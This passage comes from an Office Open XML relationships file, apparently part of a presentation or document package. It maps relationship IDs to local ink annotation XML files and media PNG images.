Target="../ink/ink700.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink695.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image459.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink703.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink708.xml"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink712.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1111.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink716.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1511.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1911.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink725.xml"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink729.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink733.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3810.png"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2311.png"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2710.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink737.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1100.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink747.xml"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image911.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1310.png"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink756.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink760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120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink693.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink698.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink711.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1011.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink724.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3110.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1811.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink732.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339.png"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image810.png"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink751.xml"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink759.xml"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2110.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image345.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image458.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink688.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image392.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink704.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image511.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink719.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2610.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2210.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1311.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink727.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3610.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink740.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink742.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink746.xml"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1610.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image453.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink754.xml"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink762.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink699.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image461.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink714.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2111.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink694.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image811.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink722.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2910.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink735.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1110.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink686.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink749.xml"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink757.xml"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1910.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink689.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image456.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink709.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16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89.xml"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1101.png"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1120.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink770.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image454.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1611.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink810.xml"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink894.xml"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink905.xml"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2110.png"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink926.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3210.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink827.xml"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink834.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image740.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink855.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink784.xml"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image951.png"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1050.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image449.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink781.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1111.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink805.xml"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink889.xml"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink900.xml"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1610.png"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink921.xml"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image970.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image392.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2710.png"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink821.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image690.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink850.xml"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image900.png"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1000.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink771.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image610.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink800.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image490.png"/><Relationship Id="rId290" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink877.xml"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink884.xml"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1230.png"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1110.png"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink916.xml"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image921.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2211.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink816.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image540.png"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image640.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink845.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image850.png"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink866.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image460.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image464.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink795.xml"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink872.xml"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1180.png"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image611.png"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink911.xml"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1711.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink811.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink822.xml"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink840.xml"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image871.png"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image800.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink861.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image455.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink790.xml"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image961.png"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1060.png"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1130.png"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink895.xml"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink906.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink772.xml"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1211.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink806.xml"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2210.png"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink927.xml"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3310.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink828.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink835.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image750.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink856.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image450.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink785.xml"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image913.png"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1012.png"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink890.xml"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink901.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3410.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image710.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink801.xml"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1710.png"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink922.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image393.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2810.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink823.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image700.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink851.xml"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image930.png"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image860.png"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink867.xml"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink878.xml"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink885.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink773.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image465.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink796.xml"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink896.xml"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1210.png"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink917.xml"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2311.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink817.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image550.png"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image650.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink846.xml"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image881.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image812.png"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink862.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink765.xml"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink873.xml"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1190.png"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image711.png"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink912.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink791.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1811.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink812.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image500.png"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink841.xml"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2310.png"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink928.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image680.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image760.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink849.xml"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink857.xml"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image890.png"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image990.png"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink881.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1100.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink774.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image456.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image511.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink799.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2610.png"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image971.png"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1070.png"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink883.xml"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1140.png"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1220.png"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image294.png"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1010.png"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink907.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink769.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink786.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1311.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink807.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3610.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink820.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image480.png"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink829.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink836.xml"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.png"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink915.xml"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink923.xml"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image912.png"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image530.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image630.png"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image712.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink844.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink852.xml"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image840.png"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink865.xml"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink876.xml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06" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image463.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink794.xml"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image920.png"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1020.png"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1170.png"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink891.xml"/><Relationship Id="rId339" 